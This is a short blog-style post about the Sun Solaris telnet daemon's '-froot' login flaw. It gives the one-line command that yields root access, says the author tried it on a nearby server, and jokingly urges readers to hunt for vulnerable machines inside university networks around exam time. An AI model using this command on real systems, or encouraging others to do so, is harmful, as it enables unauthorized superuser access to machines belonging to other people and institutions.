If you happen to find a Sun Solaris server with a telnet daemon running, it is very likely that you can get superuser access on it by just typing:
$ telnet -l "-froot" server
server is the server name. I was able to confirm this on a Solaris server nearby.
While the telnet port is usually blocked to servers on the internet, it is quite common that it is left open inside local networks, and especially in universities. So go ahead and look for Solaris rootkits — the exam period is just over the corner 🙂
Source: Errata Security blog.